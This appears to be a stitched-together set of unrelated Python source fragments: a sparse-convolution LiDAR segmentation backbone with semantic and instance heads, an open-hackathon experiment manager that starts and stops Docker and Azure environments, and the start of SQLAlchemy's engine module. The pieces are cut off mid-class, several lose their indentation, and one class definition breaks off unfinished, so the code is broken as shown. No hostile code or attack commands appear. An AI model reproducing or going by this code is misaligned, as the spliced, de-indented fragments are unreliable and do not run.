        self.bn2 = nn.BatchNorm1d(out_filters)
        # self.conv4 = conv3x3(out_filters, out_filters, indice_key=indice_key+"bef")
        # self.act4 = nn.LeakyReLU()
        # self.bn4 = nn.BatchNorm1d(out_filters)
        if pooling:
            # self.dropout = nn.Dropout3d(p=dropout_rate)
            # The downsampling conv shares `indice_key` with the matching
            # SparseInverseConv3d in UpBlock (its `up_key`).
            if height_pooling:
                # self.pool = spconv.SparseMaxPool3d(kernel_size=2, stride=2)
                self.pool = spconv.SparseConv3d(out_filters, out_filters, kernel_size=3, stride=2,
                                                padding=1, indice_key=indice_key, bias=False)
            else:
                # self.pool = spconv.SparseMaxPool3d(kernel_size=(2,2,1), stride=(2, 2, 1))
                self.pool = spconv.SparseConv3d(out_filters, out_filters, kernel_size=3, stride=(2,2,1),
                                                padding=1, indice_key=indice_key, bias=False)
        # else:
        #     self.dropout = nn.Dropout3d(p=dropout_rate)
    def forward(self, x):
        # x: spconv.SparseConvTensor; activation precedes BN, as in
        # ResContextBlock.
        shortcut = self.conv1(x)
        shortcut.features = self.act1(shortcut.features)
        shortcut.features = self.bn0(shortcut.features)
        shortcut = self.conv1_2(shortcut)
        shortcut.features = self.act1_2(shortcut.features)
        shortcut.features = self.bn0_2(shortcut.features)
        resA = self.conv2(x)
        resA.features = self.act2(resA.features)
        resA.features = self.bn1(resA.features)
        resA = self.conv3(resA)
        resA.features = self.act3(resA.features)
        resA.features = self.bn2(resA.features)
        # Feature-wise residual sum of the two branches.
        resA.features = resA.features + shortcut.features
        # resA = self.conv4(resA)
        # resA.features = self.act4(resA.features)
        # resA.features = self.bn4(resA.features)
        if self.pooling:
            # if self.drop_out:
            #     resB = self.dropout(resA.features)
            # else:
            #     resB = resA
            # Return both the downsampled tensor (for the next encoder
            # stage) and the full-resolution one (for the skip connection).
            resB = self.pool(resA)
            return resB, resA
        else:
            # if self.drop_out:
            #     resB = self.dropout(resA)
            # else:
            #     resB = resA
            return resA
class UpBlock(nn.Module):
    """Decoder block: transform, sparse inverse-conv upsample, additive
    skip connection, then three refinement convolutions.

    ``up_key`` must match the ``indice_key`` of the encoder stage whose
    SparseConv3d produced the downsampling being inverted here.
    ``kernel_size`` is accepted but unused.
    """
    def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), indice_key=None, up_key=None):
        super(UpBlock, self).__init__()
        # self.drop_out = drop_out
        #self.trans = nn.ConvTranspose2d(in_filters, out_filters, kernel_size, stride=(2, 2), padding=1)
        # Channel transform applied before upsampling.
        self.trans_dilao = conv3x3(in_filters, out_filters, indice_key=indice_key+"new_up")
        self.trans_act = nn.LeakyReLU()
        self.trans_bn = nn.BatchNorm1d(out_filters)
        # self.dropout1 = nn.Dropout3d(p=dropout_rate)
        # self.dropout2 = nn.Dropout3d(p=dropout_rate)
        # Three refinement convs applied after the skip-add.
        self.conv1 = conv1x3(out_filters, out_filters, indice_key=indice_key)
        self.act1 = nn.LeakyReLU()
        self.bn1 = nn.BatchNorm1d(out_filters)
        self.conv2 = conv3x1(out_filters, out_filters, indice_key=indice_key)
        self.act2 = nn.LeakyReLU()
        self.bn2 = nn.BatchNorm1d(out_filters)
        self.conv3 = conv3x3(out_filters, out_filters, indice_key=indice_key)
        self.act3 = nn.LeakyReLU()
        self.bn3 = nn.BatchNorm1d(out_filters)
        # self.dropout3 = nn.Dropout3d(p=dropout_rate)
        # Inverse conv restores the indices recorded under `up_key` by the
        # matching encoder downsampling conv.
        self.up_subm = spconv.SparseInverseConv3d(out_filters, out_filters, kernel_size=3, indice_key=up_key, bias=False)
    def forward(self, x, skip):
        # x: low-resolution decoder input; skip: matching encoder tensor.
        upA = self.trans_dilao(x)
        #if upA.shape != skip.shape:
        #    upA = F.pad(upA, (0, 1, 0, 1), mode='replicate')
        upA.features = self.trans_act(upA.features)
        upA.features = self.trans_bn(upA.features)
        ## upsample
        upA = self.up_subm(upA)
        # upA = F.interpolate(upA, size=skip.size()[2:], mode='trilinear', align_corners=True)
        # if self.drop_out:
        #     upA = self.dropout1(upA)
        # Additive skip connection (indices match after the inverse conv).
        upA.features = upA.features + skip.features
        # if self.drop_out:
        #     upB = self.dropout2(upB)
        upE = self.conv1(upA)
        upE.features = self.act1(upE.features)
        upE.features = self.bn1(upE.features)
        upE = self.conv2(upE)
        upE.features = self.act2(upE.features)
        upE.features = self.bn2(upE.features)
        upE = self.conv3(upE)
        upE.features = self.act3(upE.features)
        upE.features = self.bn3(upE.features)
        # if self.drop_out:
        #     upE = self.dropout3(upE)
        return upE
class ReconBlock(nn.Module):
    """Dimension-decomposition gating block.

    Three axis-wise submanifold convolutions ((3,1,1), (1,3,1), (1,1,3)),
    each followed by BN and Sigmoid, are summed and used to gate the
    input features multiplicatively.  The element-wise product with
    ``x.features`` requires ``out_filters`` to match the input channel
    count.  ``kernel_size`` and ``stride`` are accepted but unused.
    """
    def __init__(self, in_filters, out_filters, kernel_size=(3, 3, 3), stride=1, indice_key=None):
        super(ReconBlock, self).__init__()
        # One conv per spatial axis; BN then Sigmoid (gate in (0, 1)).
        self.conv1 = conv3x1x1(in_filters, out_filters, indice_key=indice_key+"bef")
        self.bn0 = nn.BatchNorm1d(out_filters)
        self.act1 = nn.Sigmoid()
        self.conv1_2 = conv1x3x1(in_filters, out_filters, indice_key=indice_key+"bef")
        self.bn0_2 = nn.BatchNorm1d(out_filters)
        self.act1_2 = nn.Sigmoid()
        self.conv1_3 = conv1x1x3(in_filters, out_filters, indice_key=indice_key+"bef")
        self.bn0_3 = nn.BatchNorm1d(out_filters)
        self.act1_3 = nn.Sigmoid()
        # self.conv2 = conv3x1(in_filters, out_filters, indice_key=indice_key+"bef")
        # self.act2 = nn.LeakyReLU()
        # self.bn1 = nn.BatchNorm1d(out_filters)
        #
        # self.conv3 = conv1x3(out_filters, out_filters, indice_key=indice_key+"bef")
        # self.act3 = nn.LeakyReLU()
        # self.bn2 = nn.BatchNorm1d(out_filters)
    def forward(self, x):
        # Each branch: conv -> BN -> Sigmoid on the sparse features.
        shortcut = self.conv1(x)
        shortcut.features = self.bn0(shortcut.features)
        shortcut.features = self.act1(shortcut.features)
        shortcut2 = self.conv1_2(x)
        shortcut2.features = self.bn0_2(shortcut2.features)
        shortcut2.features = self.act1_2(shortcut2.features)
        shortcut3 = self.conv1_3(x)
        shortcut3.features = self.bn0_3(shortcut3.features)
        shortcut3.features = self.act1_3(shortcut3.features)
        # resA = self.conv2(x)
        # resA.features = self.act2(resA.features)
        # resA.features = self.bn1(resA.features)
        #
        # resA = self.conv3(resA)
        # resA.features = self.act3(resA.features)
        # resA.features = self.bn2(resA.features)
        # Sum the three axis gates, then gate the input features.
        shortcut.features = shortcut.features + shortcut2.features + shortcut3.features
        shortcut.features = shortcut.features * x.features
        return shortcut
class Spconv_salsaNet_res_cfg(nn.Module):
    """SalsaNet-style sparse-conv encoder/decoder backbone, built from a
    config object.

    Encoder: context block + four residual blocks with progressive
    downsampling.  Decoder: four UpBlocks with additive skips, then a
    ReconBlock whose output is concatenated with the last decoder output,
    giving 4 * init_size feature channels.

    forward returns the same SparseConvTensor twice (semantic and
    instance heads consume the same features).
    """
    def __init__(self, cfg):
        super(Spconv_salsaNet_res_cfg, self).__init__()
        output_shape = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE
        # Input feature width: compressed feature size if configured,
        # otherwise the grid height (features stacked along z).
        if 'FEATURE_COMPRESSION' in cfg.MODEL.MODEL_FN:
            num_input_features = cfg.MODEL.MODEL_FN.FEATURE_COMPRESSION
        else:
            num_input_features = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
        nclasses = cfg.DATA_CONFIG.NCLASS
        n_height = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
        init_size = cfg.MODEL.BACKBONE.INIT_SIZE
        self.nclasses = nclasses
        self.nheight = n_height
        # NOTE(review): `strict` is forced to False regardless of any input.
        self.strict = False
        sparse_shape = np.array(output_shape)
        # sparse_shape[0] = 11
        self.sparse_shape = sparse_shape
        # Encoder: each ResBlock halves x/y (and z when height_pooling).
        self.downCntx = ResContextBlock(num_input_features, init_size, indice_key="pre")
        # self.resBlock1 = ResBlock(init_size, init_size, 0.2, pooling=True, height_pooling=True, indice_key="down1")
        self.resBlock2 = ResBlock(init_size, 2 * init_size, 0.2, height_pooling=True, indice_key="down2")
        self.resBlock3 = ResBlock(2 * init_size, 4 * init_size, 0.2, height_pooling=True, indice_key="down3")
        self.resBlock4 = ResBlock(4 * init_size, 8 * init_size, 0.2, pooling=True, height_pooling=False, indice_key="down4")
        self.resBlock5 = ResBlock(8 * init_size, 16 * init_size, 0.2, pooling=True, height_pooling=False, indice_key="down5")
        # self.resBlock6 = ResBlock(16 * init_size, 16 * init_size, 0.2, pooling=False, height_pooling=False, indice_key="down6")
        # self.ReconNet = ReconBlock(16 * init_size, 16 * init_size, indice_key="recon")
        # Decoder: up_key pairs each UpBlock with its encoder stage.
        self.upBlock0 = UpBlock(16 * init_size, 16 * init_size, indice_key="up0", up_key="down5")
        self.upBlock1 = UpBlock(16 * init_size, 8 * init_size, indice_key="up1", up_key="down4")
        self.upBlock2 = UpBlock(8 * init_size, 4 * init_size, indice_key="up2", up_key="down3")
        self.upBlock3 = UpBlock(4 * init_size, 2 * init_size, indice_key="up3", up_key="down2")
        # self.upBlock4 = UpBlock(4 * init_size, 2 * init_size, indice_key="up4", up_key="down2")
        # self.upBlock5 = UpBlock(2 * init_size, init_size, indice_key="up5", up_key="down1")
        self.ReconNet = ReconBlock(2*init_size, 2*init_size, indice_key="recon")
    def forward(self, voxel_features, coors, batch_size):
        # x = x.contiguous()
        coors = coors.int()
        ret = spconv.SparseConvTensor(voxel_features, coors, self.sparse_shape,
                                      batch_size)
        ret = self.downCntx(ret)
        # down0c, down0b = self.resBlock1(ret)
        # Each stage returns (downsampled, skip) -- see ResBlock.forward.
        down1c, down1b = self.resBlock2(ret)
        down2c, down2b = self.resBlock3(down1c)
        down3c, down3b = self.resBlock4(down2c)
        down4c, down4b = self.resBlock5(down3c)
        # down5b = self.resBlock6(down4c)
        # down6b = self.ReconNet(down5b)
        up4e = self.upBlock0(down4c, down4b)
        up3e = self.upBlock1(up4e, down3b)
        up2e = self.upBlock2(up3e, down2b)
        up1e = self.upBlock3(up2e, down1b)
        up0e = self.ReconNet(up1e)
        up0e.features = torch.cat((up0e.features, up1e.features), 1) # size 4 * init_size --> OK with the size of the semantic and instance heads
        return up0e, up0e
class Spconv_sem_logits_head_cfg(nn.Module):
    """Semantic-logits head: one 3x3x3 submanifold conv mapping the
    4 * init_size backbone features to per-class logits, returned as a
    dense tensor."""
    def __init__(self, cfg):
        super(Spconv_sem_logits_head_cfg, self).__init__()
        # Mirror the backbone's config reads; only NCLASS and INIT_SIZE
        # are actually consumed by this head.
        grid_shape = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE
        if 'FEATURE_COMPRESSION' in cfg.MODEL.MODEL_FN:
            in_feature_width = cfg.MODEL.MODEL_FN.FEATURE_COMPRESSION
        else:
            in_feature_width = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
        num_classes = cfg.DATA_CONFIG.NCLASS
        grid_height = cfg.DATA_CONFIG.DATALOADER.GRID_SIZE[2]
        base_channels = cfg.MODEL.BACKBONE.INIT_SIZE
        self.logits = spconv.SubMConv3d(4 * base_channels, num_classes, indice_key="logit",
                                        kernel_size=3, stride=1, padding=1, bias=True)
    def forward(self, fea):
        """Project sparse features to class logits and densify."""
        return self.logits(fea).dense()
class Spconv_ins_offset_concatxyz_threelayers_head_cfg(nn.Module):
    """Instance-offset head: three sparse convs, then per-point feature
    gathering and a small MLP that concatenates point xyz coordinates.

    forward returns ``(pt_pred_offsets_list, pt_ins_fea_list)`` — one
    entry per batch element, each a per-point tensor.
    """
    def __init__(self, cfg):
        super(Spconv_ins_offset_concatxyz_threelayers_head_cfg, self).__init__()
        init_size = cfg.MODEL.BACKBONE.INIT_SIZE
        # Backbone output width (see Spconv_salsaNet_res_cfg.forward).
        self.pt_fea_dim = 4 * init_size
        self.embedding_dim = cfg.MODEL.INS_HEAD.EMBEDDING_CHANNEL
        # Three conv stages narrowing 4*init_size -> 2*init_size -> init_size.
        self.conv1 = conv3x3(self.pt_fea_dim, self.pt_fea_dim, indice_key='offset_head_conv1')
        self.bn1 = nn.BatchNorm1d(self.pt_fea_dim)
        self.act1 = nn.LeakyReLU()
        self.conv2 = conv3x3(self.pt_fea_dim, 2 * init_size, indice_key='offset_head_conv2')
        self.bn2 = nn.BatchNorm1d(2 * init_size)
        self.act2 = nn.LeakyReLU()
        self.conv3 = conv3x3(2 * init_size, init_size, indice_key='offset_head_conv3')
        self.bn3 = nn.BatchNorm1d(init_size)
        self.act3 = nn.LeakyReLU()
        # MLP over [voxel feature, xyz] per point.
        self.offset = nn.Sequential(
            nn.Linear(init_size+3, init_size, bias=True),
            nn.BatchNorm1d(init_size),
            nn.ReLU()
        )
        self.offset_linear = nn.Linear(init_size, self.embedding_dim, bias=True)
    def forward(self, fea, batch):
        # fea: spconv.SparseConvTensor from the backbone.
        # batch: dict with 'grid' (per-point voxel indices) and
        # 'pt_cart_xyz' (per-point numpy xyz) -- one entry per batch item.
        fea = self.conv1(fea)
        fea.features = self.act1(self.bn1(fea.features))
        fea = self.conv2(fea)
        fea.features = self.act2(self.bn2(fea.features))
        fea = self.conv3(fea)
        fea.features = self.act3(self.bn3(fea.features))
        grid_ind = batch['grid']
        xyz = batch['pt_cart_xyz']
        # Densify and move channels last so per-point gathering can index
        # (batch, x, y, z) -> feature vector.
        fea = fea.dense()
        fea = fea.permute(0, 2, 3, 4, 1)
        pt_ins_fea_list = []
        for batch_i, grid_ind_i in enumerate(grid_ind):
            pt_ins_fea_list.append(fea[batch_i, grid_ind[batch_i][:,0], grid_ind[batch_i][:,1], grid_ind[batch_i][:,2]])
        pt_pred_offsets_list = []
        for batch_i, pt_ins_fea in enumerate(pt_ins_fea_list):
            # NOTE(review): assumes CUDA is available (hard-coded .cuda()).
            pt_pred_offsets_list.append(self.offset_linear(self.offset(torch.cat([pt_ins_fea,torch.from_numpy(xyz[batch_i]).cuda()],dim=1))))
        return pt_pred_offsets_list, pt_ins_fea_list
class Spconv_alsaNet_res(nn.Module):
def __init__(self,
output_shape,
use_norm=True,
num_input_features=128,
nclasses = 20, n_height = 32, strict=False, init_size=16):
super(Spconv_alsaNet_res, self).__init__()
self.nclasses = nclasses
self.nheight = n_height
self.strict = False
sparse_shape = np.array(output_shape)
# sparse_shape[0] = 11
print(sparse_shape)
self.sparse_shape = sparse_shape
self.downCntx = ResContextBlock(num_input_features, init_size, indice_key="pre")
# self.resBlock1 | |
<reponame>akondasif/open-hackathon-bak_01<filename>open-hackathon-server/src/hackathon/expr/expr_mgr.py
# -*- coding: utf-8 -*-
#
# -----------------------------------------------------------------------------------
# Copyright (c) Microsoft Open Technologies (Shanghai) Co. Ltd. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -----------------------------------------------------------------------------------
import sys
sys.path.append("..")
from hackathon import (
Component,
RequiredFeature,
)
from hackathon.constants import (
EStatus,
VERemoteProvider,
VE_PROVIDER,
PortBindingType,
VEStatus,
ReservedUser,
AVMStatus,
)
from hackathon.database.models import (
VirtualEnvironment,
DockerHostServer,
Experiment,
Hackathon,
Template,
User
)
from hackathon.azureformation.azureFormation import (
AzureFormation,
)
from hackathon.hackathon_response import (
internal_server_error,
precondition_failed,
not_found,
access_denied,
ok,
)
from hackathon.template.docker_template_unit import (
DockerTemplateUnit,
)
from hackathon.template.base_template import (
BaseTemplate,
)
import json
import random
import string
from sqlalchemy import (
and_,
)
from datetime import timedelta
from hackathon.constants import CLOUD_ECLIPSE
class ExprManager(Component):
register_manager = RequiredFeature("register_manager")
user_manager = RequiredFeature("user_manager")
hackathon_manager = RequiredFeature("hackathon_manager")
template_manager = RequiredFeature("template_manager")
docker = RequiredFeature("docker")
scheduler = RequiredFeature("scheduler")
def start_expr(self, hackathon_name, template_name, user_id):
"""
A user uses a template to start a experiment under a hackathon
:param hackathon_name:
:param template_name:
:param user_id:
:return:
"""
hack_temp = self.__check_template_status(hackathon_name, template_name)
if hack_temp is None:
return not_found('hackathon or template is not existed')
hackathon = hack_temp[0]
if not self.register_manager.is_user_registered(user_id, hackathon):
return access_denied("user not registered or not approved")
if hackathon.event_end_time < self.util.get_now():
self.log.warn("hackathon is ended. The expr starting process will be stopped")
return precondition_failed('hackathen is ended')
template = hack_temp[1]
if user_id > 0:
expr = self.__check_expr_status(user_id, hackathon, template)
if expr is not None:
return self.__report_expr_status(expr)
# new expr
return self.__start_new_expr(hackathon, template, user_id)
def heart_beat(self, expr_id):
expr = self.db.find_first_object_by(Experiment, id=expr_id, status=EStatus.RUNNING)
if expr is None:
return not_found('Experiment does not running')
expr.last_heart_beat_time = self.util.get_now()
self.db.commit()
return ok('OK')
    def stop_expr(self, expr_id, force=0):
        """Stop (or force-delete) a running experiment.

        :param expr_id: experiment id
        :param force: 0: only stop container and release ports, 1: force stop and delete container and release ports.
        :return: ok response on success (also when no running experiment
            matches), or an internal_server_error response on failure
        """
        self.log.debug("begin to stop %d" % expr_id)
        expr = self.db.find_first_object_by(Experiment, id=expr_id, status=EStatus.RUNNING)
        if expr is not None:
            # Docker
            docker = self.docker.get_docker(expr.hackathon)
            if expr.template.provider == VE_PROVIDER.DOCKER:
                # stop containers
                for c in expr.virtual_environments.all():
                    try:
                        self.log.debug("begin to stop %s" % c.name)
                        if force:
                            docker.delete(c.name, virtual_environment=c, container=c.container, expr_id=expr_id)
                            c.status = VEStatus.DELETED
                        else:
                            docker.stop(c.name, virtual_environment=c, container=c.container, expr_id=expr_id)
                            c.status = VEStatus.STOPPED
                    except Exception as e:
                        # any container failure rolls back the whole experiment
                        self.log.error(e)
                        self.__roll_back(expr_id)
                        return internal_server_error('Failed stop/delete container')
                if force:
                    expr.status = EStatus.DELETED
                else:
                    expr.status = EStatus.STOPPED
                self.db.commit()
            else:
                # azure-provided experiment: deallocate the VM
                try:
                    # todo support delete azure vm
                    hosted_docker = RequiredFeature("hosted_docker")
                    af = AzureFormation(hosted_docker.load_azure_key_id(expr_id))
                    af.stop(expr_id, AVMStatus.STOPPED_DEALLOCATED)
                except Exception as e:
                    self.log.error(e)
                    return internal_server_error('Failed stopping azure')
            self.log.debug("experiment %d ended success" % expr_id)
            return ok('OK')
        else:
            return ok('expr not exist')
def get_expr_status(self, expr_id):
expr = self.db.find_first_object_by(Experiment, id=expr_id)
if expr is not None:
return self.__report_expr_status(expr)
else:
return not_found('Experiment Not found')
    def get_expr_list_by_user_id(self, user_id):
        """Return dicts of this user's non-terminal experiments.

        NOTE(review): ``Experiment.status < 5`` relies on the numeric
        ordering of EStatus codes (terminal states >= 5 — confirm against
        constants), and ``map`` returning a list is Python 2 behaviour.
        """
        return map(lambda u: u.dic(),
                   self.db.find_all_objects(Experiment, and_(Experiment.user_id == user_id,
                                                             Experiment.status < 5)))
    def get_expr_list_by_hackathon_id(self, hackathon_id, **kwargs):
        """Return experiments of a hackathon, each enriched with user
        info, filtered by the kwargs understood by
        ``__get_filter_condition`` (defined elsewhere in this class).

        NOTE(review): ``map`` returning a list is Python 2 behaviour.
        """
        condition = self.__get_filter_condition(hackathon_id, **kwargs)
        experiments = self.db.find_all_objects(Experiment, condition)
        return map(lambda u: self.__get_expr_with_user_info(u), experiments)
def recycle_expr(self):
"""
recycle experiment when idle more than 24 hours
:return:
"""
self.log.debug("start checking recyclable experiment ... ")
recycle_hours = self.util.safe_get_config('recycle.idle_hours', 24)
expr_time_cond = Experiment.last_heart_beat_time + timedelta(hours=recycle_hours) > self.util.get_now()
recycle_cond = Experiment.hackathon_id.in_(self.hackathon_manager.get_recyclable_hackathon_list())
status_cond = Experiment.status == EStatus.RUNNING
r = self.db.find_first_object(Experiment, status_cond, expr_time_cond, recycle_cond)
if r is not None:
self.stop_expr(r.id)
self.log.debug("it's stopping " + str(r.id) + " inactive experiment now")
else:
self.log.debug("There is now inactive experiment now")
return
def schedule_pre_allocate_expr_job(self):
next_run_time = self.util.get_now() + timedelta(seconds=1)
self.scheduler.add_interval(feature="expr_manager",
method="pre_allocate_expr",
id="pre_allocate_expr",
next_run_time=next_run_time,
minutes=self.util.safe_get_config("pre_allocate.check_interval_minutes", 5))
    def pre_allocate_expr(self):
        """Pre-start experiments for templates of pre-allocation-enabled
        hackathons, owned by the reserved default user.

        At most one new experiment is started per call (``break`` after a
        start); counts of STARTING/RUNNING reserved experiments gate how
        many are kept warm per template.
        """
        # only deal with online hackathons
        hackathon_id_list = self.hackathon_manager.get_pre_allocate_enabled_hackathon_list()
        templates = self.db.find_all_objects(Template, Template.hackathon_id.in_(hackathon_id_list))
        for template in templates:
            try:
                pre_num = self.hackathon_manager.get_pre_allocate_number(template.hackathon)
                # reserved-user experiments already warm for this template
                curr_num = self.db.count(Experiment,
                                         Experiment.user_id == ReservedUser.DefaultUserID,
                                         Experiment.template_id == template.id,
                                         (Experiment.status == EStatus.STARTING) | (
                                             Experiment.status == EStatus.RUNNING))
                # todo test azure, config num
                if template.provider == VE_PROVIDER.AZURE:
                    if curr_num < pre_num:
                        remain_num = pre_num - curr_num
                        start_num = self.db.count_by(Experiment,
                                                     user_id=ReservedUser.DefaultUserID,
                                                     template=template,
                                                     status=EStatus.STARTING)
                        # azure VMs are started one at a time: bail out while
                        # one is still STARTING
                        if start_num > 0:
                            self.log.debug("there is an azure env starting, will check later ... ")
                            return
                        else:
                            self.log.debug(
                                "no starting template: %s , remain num is %d ... " % (template.name, remain_num))
                            self.start_expr(template.hackathon.name, template.name, ReservedUser.DefaultUserID)
                            break
                            # curr_num += 1
                    # self.log.debug("all template %s start complete" % template.name)
                elif template.provider == VE_PROVIDER.DOCKER:
                    self.log.debug(
                        "template name is %s, hackathon name is %s" % (template.name, template.hackathon.name))
                    if curr_num < pre_num:
                        remain_num = pre_num - curr_num
                        self.log.debug("no idle template: %s, remain num is %d ... " % (template.name, remain_num))
                        self.start_expr(template.hackathon.name, template.name, ReservedUser.DefaultUserID)
                        # curr_num += 1
                        break
                        # self.log.debug("all template %s start complete" % template.name)
            except Exception as e:
                # keep iterating other templates on failure
                self.log.error(e)
                self.log.error("check default experiment failed")
# --------------------------------------------- helper function ---------------------------------------------#
def __start_new_expr(self, hackathon, template, user_id):
# new expr
expr = self.db.add_object_kwargs(Experiment,
user_id=user_id,
hackathon_id=hackathon.id,
status=EStatus.INIT,
template_id=template.id)
self.db.commit()
curr_num = self.db.count(Experiment,
Experiment.user_id == ReservedUser.DefaultUserID,
Experiment.template == template,
(Experiment.status == EStatus.STARTING) |
(Experiment.status == EStatus.RUNNING))
if template.provider == VE_PROVIDER.DOCKER:
try:
template_dic = self.template_manager.load_template(template)
virtual_environments_list = template_dic[BaseTemplate.VIRTUAL_ENVIRONMENTS]
if curr_num != 0 and curr_num >= self.util.get_config("pre_allocate.docker"):
return
expr.status = EStatus.STARTING
self.db.commit()
map(lambda virtual_environment_dic:
self.__remote_start_container(hackathon, expr, virtual_environment_dic),
virtual_environments_list)
expr.status = EStatus.RUNNING
self.db.commit()
except Exception as e:
self.log.error(e)
self.log.error("Failed starting containers")
self.__roll_back(expr.id)
return internal_server_error('Failed starting containers')
else:
if curr_num != 0 and curr_num >= self.util.get_config("pre_allocate.azure"):
return
expr.status = EStatus.STARTING
self.db.commit()
try:
af = AzureFormation(self.docker.__load_azure_key_id(expr.id))
af.create(expr.id)
except Exception as e:
self.log.error(e)
return internal_server_error('Failed starting azure vm')
# after everything is ready, set the expr state to running
# response to caller
return self.__report_expr_status(expr)
    def __report_expr_status(self, expr):
        """Build the status dict returned to API callers for *expr*.

        Always contains id/status/hackathon/timestamps; when the
        experiment is RUNNING it is extended with ``remote_servers``
        (guacamole / cloud-eclipse links) and ``public_urls``.
        """
        # flag the experiment as errored when any container died on its host
        containers = self.__get_containers_by_exper(expr)
        for container in containers:
            # expr status(restarting or running) is not match container running status on docker host
            if not self.docker.hosted_docker.check_container_status_is_normal(container):
                try:
                    self.db.update_object(expr, status=EStatus.UNEXPECTED_ERROR)
                    self.db.update_object(container.virtual_environment, status=VEStatus.UNEXPECTEDERRORS)
                    break
                except Exception as ex:
                    self.log.error(ex)
        ret = {
            "expr_id": expr.id,
            "status": expr.status,
            "hackathon": expr.hackathon.name,
            "create_time": str(expr.create_time),
            "last_heart_beat_time": str(expr.last_heart_beat_time),
        }
        if expr.status != EStatus.RUNNING:
            return ret
        # return remote clients include guacamole and cloudEclipse
        remote_servers = []
        for ve in expr.virtual_environments.all():
            if ve.remote_provider == VERemoteProvider.Guacamole:
                try:
                    # remote_paras is a JSON blob stored per virtual environment
                    guacamole_config = json.loads(ve.remote_paras)
                    guacamole_host = self.util.safe_get_config("guacamole.host", "localhost:8080")
                    # target url format:
                    # http://localhost:8080/guacamole/#/client/c/{name}?name={name}&oh={token}
                    name = guacamole_config["name"]
                    url = guacamole_host + '/guacamole/#/client/c/%s?name=%s' % (name, name)
                    remote_servers.append({
                        "name": guacamole_config["displayname"],
                        "url": url
                    })
                    # cloud eclipse
                    cloud_eclipse_url = self.__get_cloud_eclipse_url(expr)
                    if cloud_eclipse_url is not None:
                        remote_servers.append({
                            "name": CLOUD_ECLIPSE.CLOUD_ECLIPSE,
                            "url": cloud_eclipse_url
                        })
                except Exception as e:
                    # a malformed config only drops this VE's links
                    self.log.error(e)
        if expr.status == EStatus.RUNNING:
            ret["remote_servers"] = remote_servers
        # return public accessible web url
        public_urls = []
        if expr.template.provider == VE_PROVIDER.DOCKER:
            for ve in expr.virtual_environments.all():
                for p in ve.port_bindings.all():
                    if p.binding_type == PortBindingType.CLOUD_SERVICE and p.url is not None:
                        hs = self.db.find_first_object_by(DockerHostServer, id=p.binding_resource_id)
                        # p.url is a format template taking (public_dns, port)
                        url = p.url.format(hs.public_dns, p.port_from)
                        public_urls.append({
                            "name": p.name,
                            "url": url
                        })
        else:
            for ve in expr.virtual_environments.all():
                for vm in ve.azure_virtual_machines_v.all():
                    # NOTE(review): assumes an endpoint with private port 80
                    # exists; `ep` would be None otherwise -- confirm upstream
                    ep = vm.azure_endpoints.filter_by(private_port=80).first()
                    url = 'http://%s:%s' % (vm.public_ip, ep.public_port)
                    public_urls.append({
                        "name": ep.name,
                        "url": url
                    })
        ret["public_urls"] = public_urls
        return ret
def __check_template_status(self, hackathon_name, template_name):
hackathon = self.db.find_first_object_by(Hackathon, name=hackathon_name)
if hackathon is None:
return None
template = self.db.find_first_object_by(Template, hackathon_id=hackathon.id, name=template_name)
if template is None or self.template_manager.load_template(template) is None:
return None
return [hackathon, template]
def __remote_start_container(self, hackathon, expr, virtual_environment_dic):
docker_template_unit = DockerTemplateUnit(virtual_environment_dic)
old_name = docker_template_unit.get_name()
suffix = "".join(random.sample(string.ascii_letters + string.digits, 8))
new_name = '%d-%s-%s' % (expr.id, old_name, suffix)
docker_template_unit.set_name(new_name)
self.log.debug("starting to start container: %s" % new_name)
# db entity
ve = VirtualEnvironment(provider=VE_PROVIDER.DOCKER,
name=new_name,
image=docker_template_unit.get_image_with_tag(),
status=VEStatus.INIT,
remote_provider=VERemoteProvider.Guacamole,
experiment=expr)
self.db.add_object(ve)
# start container remotely , use hosted docker or alauda docker
docker = self.docker.get_docker(hackathon)
container_ret = docker.start(docker_template_unit,
hackathon=hackathon,
virtual_environment=ve,
experiment=expr)
if container_ret is None:
self.log.error("container %s fail to run" % new_name)
| |
# engine/base.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import with_statement
import contextlib
import sys
from .interfaces import Connectable
from .interfaces import ExceptionContext
from .util import _distill_params
from .util import _distill_params_20
from .. import exc
from .. import inspection
from .. import log
from .. import util
from ..sql import compiler
from ..sql import util as sql_util
"""Defines :class:`_engine.Connection` and :class:`_engine.Engine`.
"""
_EMPTY_EXECUTION_OPTS = util.immutabledict()
class Connection(Connectable):
"""Provides high-level functionality for a wrapped DB-API connection.
**This is the SQLAlchemy 1.x.x version** of the :class:`_engine.Connection`
class. For the :term:`2.0 style` version, which features some API
differences, see :class:`_future.Connection`.
The :class:`_engine.Connection` object is procured by calling
the :meth:`_engine.Engine.connect` method of the :class:`_engine.Engine`
object, and provides services for execution of SQL statements as well
as transaction control.
The Connection object is **not** thread-safe. While a Connection can be
shared among threads using properly synchronized access, it is still
possible that the underlying DBAPI connection may not support shared
access between threads. Check the DBAPI documentation for details.
The Connection object represents a single DBAPI connection checked out
from the connection pool. In this state, the connection pool has no affect
upon the connection, including its expiration or timeout state. For the
connection pool to properly manage connections, connections should be
